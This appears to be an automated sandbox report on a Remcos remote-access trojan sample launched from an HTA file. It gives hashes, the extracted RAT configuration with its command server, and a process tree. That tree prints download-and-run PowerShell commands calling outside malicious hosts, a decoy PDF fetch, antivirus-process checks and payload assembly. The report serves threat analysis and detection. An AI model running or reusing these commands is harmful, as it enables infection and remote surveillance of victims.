remcos | 8da5bb4d9cfd29718720e839bb75ee58f92b6e41f0181b6eede4234d3122dab6

Analysis

max time kernel
147s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/01/2025, 03:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c.hta
Size

1KB
MD5

4fadf00aa57b7ca6bcb6b02cb338c0b2
SHA1

ceb81e97c94c5655d1743114044f505184ddead2
SHA256

8da5bb4d9cfd29718720e839bb75ee58f92b6e41f0181b6eede4234d3122dab6
SHA512

99f25e03da69b6afded6be3b07bf7bdd90a2e7a08663cf4b9183674e4c0cdf6ad61c400b212341d84b3f82fa2ee1ccf9e1362d7f8b21460b6bc6a6612c897c2c

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://candwfarmsllc.com/c2.bat

Extracted

Family

remcos

Botnet

RemoteHost

me-work.com:7009

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-3QMI88
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3096 created 3424	3096	Propose.com	56
PID 3096 created 3424	3096	Propose.com	56

Blocklisted process makes network request 6 IoCs

flow	pid	Process
13	3032	powershell.exe
16	4492	powershell.exe
18	4492	powershell.exe
20	4492	powershell.exe
21	4492	powershell.exe
24	3108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3108	powershell.exe
1484	powershell.exe
4492	powershell.exe
4492	powershell.exe
3108	powershell.exe
3032	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	msword.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2628	msword.exe
3096	Propose.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
876	tasklist.exe
1752	tasklist.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ExpenditureBlood	msword.exe
File opened for modification	C:\Windows\DentalSubtle	msword.exe
File opened for modification	C:\Windows\EquationsHighlights	msword.exe
File opened for modification	C:\Windows\OurProperty	msword.exe
File opened for modification	C:\Windows\ItemAnytime	msword.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Propose.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msword.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3484	schtasks.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
4492	powershell.exe
4492	powershell.exe
3108	powershell.exe
3108	powershell.exe
1484	powershell.exe
1484	powershell.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com
3096	Propose.com

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	876	tasklist.exe
Token: SeDebugPrivilege	1752	tasklist.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4472	AcroRd32.exe
3096	Propose.com
3096	Propose.com
3096	Propose.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3096	Propose.com
3096	Propose.com
3096	Propose.com

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
4472	AcroRd32.exe
3096	Propose.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 3032	2340	mshta.exe	82
PID 2340 wrote to memory of 3032	2340	mshta.exe	82
PID 2340 wrote to memory of 3032	2340	mshta.exe	82
PID 3032 wrote to memory of 3740	3032	powershell.exe	84
PID 3032 wrote to memory of 3740	3032	powershell.exe	84
PID 3032 wrote to memory of 3740	3032	powershell.exe	84
PID 3740 wrote to memory of 4492	3740	cmd.exe	85
PID 3740 wrote to memory of 4492	3740	cmd.exe	85
PID 3740 wrote to memory of 4492	3740	cmd.exe	85
PID 3740 wrote to memory of 4472	3740	cmd.exe	86
PID 3740 wrote to memory of 4472	3740	cmd.exe	86
PID 3740 wrote to memory of 4472	3740	cmd.exe	86
PID 3740 wrote to memory of 3108	3740	cmd.exe	88
PID 3740 wrote to memory of 3108	3740	cmd.exe	88
PID 3740 wrote to memory of 3108	3740	cmd.exe	88
PID 4472 wrote to memory of 2020	4472	AcroRd32.exe	89
PID 4472 wrote to memory of 2020	4472	AcroRd32.exe	89
PID 4472 wrote to memory of 2020	4472	AcroRd32.exe	89
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 3980	2020	RdrCEF.exe	90
PID 2020 wrote to memory of 964	2020	RdrCEF.exe	91
PID 2020 wrote to memory of 964	2020	RdrCEF.exe	91
PID 2020 wrote to memory of 964	2020	RdrCEF.exe	91
PID 2020 wrote to memory of 964	2020	RdrCEF.exe	91
PID 2020 wrote to memory of 964	2020	RdrCEF.exe	91

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3424
- C:\Windows\SysWOW64\mshta.exe
  C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c2.bat""
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3740
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4492
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\W2.pdf"
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4472
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2020
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C4FD79670FB47510E8FF077C4395A72 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3980
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2E8AFA0B9ED77F74AF9524CAF245BC03 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2E8AFA0B9ED77F74AF9524CAF245BC03 --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:964
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D2A1BDE1056805454BE388D086DAAF83 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:756
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BD9E38620B7DB9CD277A6FA4236E61AD --mojo-platform-channel-handle=1884 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3100
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B73579E275AA1FCF6D3C573B3D5121DD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B73579E275AA1FCF6D3C573B3D5121DD --renderer-client-id=6 --mojo-platform-channel-handle=2536 --allow-no-sandbox-job /prefetch:1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4540
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2B51BBC1C89D9CDD01F32717A4BC22F4 --mojo-platform-channel-handle=1888 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
    - - C:\Users\Admin\AppData\Local\Temp\msword\msword.exe
        
        msword.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2628
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4400
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:876
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4692
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 361684
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Approaches
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2560
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Korea" Measurement
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5016
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
        7⤵
